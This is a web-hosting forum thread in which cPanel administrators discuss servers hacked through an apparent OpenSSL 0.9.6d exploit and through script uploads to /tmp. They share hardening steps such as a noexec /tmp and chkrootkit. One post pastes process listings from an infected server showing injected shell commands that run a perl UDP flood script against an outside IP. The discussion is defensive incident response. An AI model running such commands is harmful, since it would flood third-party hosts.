OpenSSL Hack Vulnerability

matthewdavis

Well-Known Member
Jun 26, 2003
90
0
156
NC, USA
This is really a fairly known bug. But I do believe our servers are still effected by it due to the fact I have 2 servers that have been hit by this bug. So any insight as to why our servers were hit by this would be greatly appreciated.

I noticed some fishy directories in /tmp and /usr/tmp. A few names of these directories are .inoe, .xfs, .n, .a, and a directory with a bunch of spaces. And inside these directories are eggdrop bots and programs to hide processes so a normal top or ps output doesn't show anything suspecious.

All these files are owned by 'nobody' which leads me to believe they came in thru the web server. Plus on one of my servers they left behind a tool called 'scanSSL' which looks for servers with OpenSSL 0.9.6d and older. I keep my server up-to-date with redhat errerta packages and cpanel updates, and yet my server is still vulnerable.

And I'd be happy to stand corrected about any of this. If I overlooked something, please tell me.

But I'd suggest everyone checking your /tmp, /var/tmp and /usr/tmp directories for any suspecious directories.

SSH into your machine and 'ls -a /tmp' and 'ls -a /usr/tmp' and so on.

cPanel.net Support Ticket Number:
 

matthewdavis

Well-Known Member
Jun 26, 2003
90
0
156
NC, USA
Has anyone encountered this? Does anyone have anything suspecious in their /tmp, /usr/tmp, or /var/tmp directories?

Do a 'ls -alR /var/tmp' or 'ls -alR /usr/tmp' or 'ls -alR /tmp' and if you see anything like eggdrop's or scripts, or irc servers, then its possiable you've been hacked.

cPanel.net Support Ticket Number:
 

Curious Too

Well-Known Member
Aug 31, 2001
435
2
318
cPanel Access Level
Root Administrator
What evidence do you have that this was an OpenSSL exploit? I have had files dropped in the tmp directory via pMachine, GreyMatter, Gallery and a poorly coded Moveable Type template.

cPanel.net Support Ticket Number:
 

matthewdavis

Well-Known Member
Jun 26, 2003
90
0
156
NC, USA
Well, because one of my servers had a few scripts, 'scanSSL' as one of them, and a script which would run nmap and find IPs running web servers. Plus one of them had the 'openssl-too-open.c' program there.

And from the openssl-too-open.c file -
OpenSSL v0.9.6d and below remote exploit for Apache/mod_ssl servers which takes advantage of the KEY_ARG overflow. Tested against most major Linux distributions. Gives a remote nobody shell on Apache and remote root on other servers. Includes an OpenSSL vulnerability scanner which is more reliable than the RUS-CERT scanner and a detailed vulnerability analysis.
So I can only assume it was using an SSL exploit. Current I have a hacker I haven't cracked down on yet because he's just running a simple eggdrop which no dangerous scripts. And I'm monitoring the activity and how he restarts the eggdrop bot.

I'll post my results when I have some.

cPanel.net Support Ticket Number:
 

techark

Well-Known Member
May 22, 2002
277
0
316
90% of the time they drop these in via a bad script on a site some where.

cd /usr/local/apache/domlogs and type grep wget ./*

Lots of time you find the account they came in through.

It is a good idea to make your tmp dir no execute to keep them from running the scripts there.

cPanel.net Support Ticket Number:
 

carock

Well-Known Member
Sep 25, 2002
270
9
168
St. Charles, MO
Lock Icon wrong too...

According to the Certi Advisory, and RedHat Errata, the version of OpenSSL I had installed on my Cpanel server was vulnerable.

Yet, there is no lock icon at the top of the WHM News on my box.

Who's responsible for making those?

When I ran the update System Software link, it did upgrade my OpenSSL to 0.9.6b-35.7 which is the latest patched version from RedHat.

Chuck

cPanel.net Support Ticket Number:
 
Last edited:

PbG

Well-Known Member
Mar 11, 2003
249
0
166
Re: Lock Icon wrong too...

Until the release number changes the icon will reflect 0.9.6 as secure but as long as the updates occur I would not worry about the difference between the icon showing 0.9.6b-35.7 and merely 0.9.6/0.9.6b

Originally posted by carock
According to the Certi Advisory, and RedHat Errata, the version of OpenSSL I had installed on my Cpanel server was vulnerable.

Yet, there is no lock icon at the top of the WHM News on my box.

Who's responsible for making those?

When I ran the update System Software link, it did upgrade my OpenSSL to 0.9.6b-35.7 which is the latest patched version from RedHat.

Chuck

cPanel.net Support Ticket Number:
cPanel.net Support Ticket Number:
 

gundamz

Well-Known Member
Mar 27, 2002
245
0
316
I am currently having this problem now. What can i do to stop this hacker?
 

eth00

Well-Known Member
PartnerNOC
Mar 30, 2003
721
1
168
NC
cPanel Access Level
Root Administrator
The first and biggest thing is to secure your /tmp and make it non executable. Alot of stuff comes in though /tmp and is exectured. If you do a search you should be able to find some good information. You also should run chkrootkit to make sure nothing else happened.
 

gundamz

Well-Known Member
Mar 27, 2002
245
0
316
What is the safest permission should we give for "tmp"?
 

Website Rob

Well-Known Member
Mar 23, 2002
1,501
1
318
Alberta, Canada
cPanel Access Level
Root Administrator
Looking at it is the first thing that comes to my mind. ;)

If you haven't done it before, open: /etc/fstab with your favourite editor, change the 'tmp' settings, save & close the file. Then use: mount -a to have the changes kick in.
 

BeerUser

Active Member
Apr 16, 2004
36
0
156
PHP:
LABEL=/                 /                       ext3    defaults,usrquota        1 1
LABEL=/boot             /boot                   ext3    defaults        1 2
none                    /dev/pts                devpts  gid=5,mode=620  0 0
none                    /proc                   proc    defaults        0 0
none                    /dev/shm                tmpfs   defaults        0 0
/dev/hda2               swap                    swap    defaults        0 0
/dev/fd0                /mnt/floppy             auto    noauto,owner,kudzu 0 0
is what I have when i pico the file...

How come tmp isnt listed at all.. I did use /scripts/securetmp i think it was.
 

gundamz

Well-Known Member
Mar 27, 2002
245
0
316
Originally posted by Website Rob
Looking at it is the first thing that comes to my mind. ;)

If you haven't done it before, open: /etc/fstab with your favourite editor, change the 'tmp' settings, save & close the file. Then use: mount -a to have the changes kick in.
does /scripts/securetmp does the same trick and secure my tmp?
 

Website Rob

Well-Known Member
Mar 23, 2002
1,501
1
318
Alberta, Canada
cPanel Access Level
Root Administrator
If 'tmp' does not have its own partition, then I would use that script as it does somewhat secure it -- which is definitely better than not doing anything.
 

gundamz

Well-Known Member
Mar 27, 2002
245
0
316
ok..
 

tvcnet

Well-Known Member
PartnerNOC
Aug 15, 2003
125
5
168
San Diego
cPanel Access Level
DataCenter Provider
tmp Secured but hacks continue

Hi folks.
For those of you who feel safe after making your /tmp directory non executable.

We've had it set non executable for months and one morning found the following in /tmp "running" and happily DOS'ing another host.

nobody 1073 30041 0 16:21 ? 00:00:00 lpd
nobody 1089 1 0 16:21 ? 00:00:00 /bin/sh
nobody 9451 1073 0 17:04 ? 00:00:00 sh -c echo "(`whoami`@`uname -n`:`pwd`)"; /
nobody 9457 9451 0 17:04 ? 00:00:00 /bin/sh
nobody 9689 10678 0 17:05 ? 00:00:00 /usr/local/apache/bin/httpd -DSSL
mysql 9961 5169 0 17:06 ? 00:00:02 /usr/sbin/mysqld --basedir --datadirvar
mysql 10323 5169 0 17:07 ? 00:00:00 /usr/sbin/mysqld --basedir --datadirvar
nobody 11992 10678 0 17:15 ? 00:00:00 /usr/local/apache/bin/httpd -DSSL
nobody 12612 9457 22 17:16 ? 00:52:06 perl /tmp/udp.pl 69.64.34.214 6000 1
mysql 13555 5169 0 17:20 ? 00:00:00 /usr/sbin/mysqld --basedir --datadirvar
nobody 13558 9689 0 17:20 ? 00:00:00 sh -c cd /dev/shm;/usr/bin/perl udp.pl 69.6
nobody 13559 13558 21 17:20 ? 00:49:13 /usr/bin/perl udp.pl 69.64.34.214 6000 1
mysql 14053 5169 0 17:21 ? 00:00:00 /usr/sbin/mysqld --basedir --datadirvar
nobody 14055 11992 0 17:21 ? 00:00:00 sh -c cd /dev/shm;/usr/bin/perl udp.pl 69.6
nobody 14057 14055 21 17:21 ? 00:48:34 /usr/bin/perl udp.pl 69.64.34.214 6000 1
nobody 16595 10678 0 17:30 ? 00:00:00 /usr/local/apache/bin/httpd -DSSL
mysql 16604 5169 0 17:30 ? 00:00:00 /usr/sbin/mysqld --basedir --datadirvar
nobody 16608 16595 0 17:30 ? 00:00:00 sh -c cd /dev/shm;/usr/bin/perl udp.pl 69.6
nobody 16609 16608 21 17:30 ? 00:46:04 /usr/bin/perl udp.pl 69.64.34.214 6000 1


Not this command that somehow gets past the non-exectuable setting:
sh -c cd /dev/shm;/usr/bin/perl udp.pl

I can assure you that no one has SSH access on our server other than a few trusted clients.

What do you all make of this?

Thanks,
Jim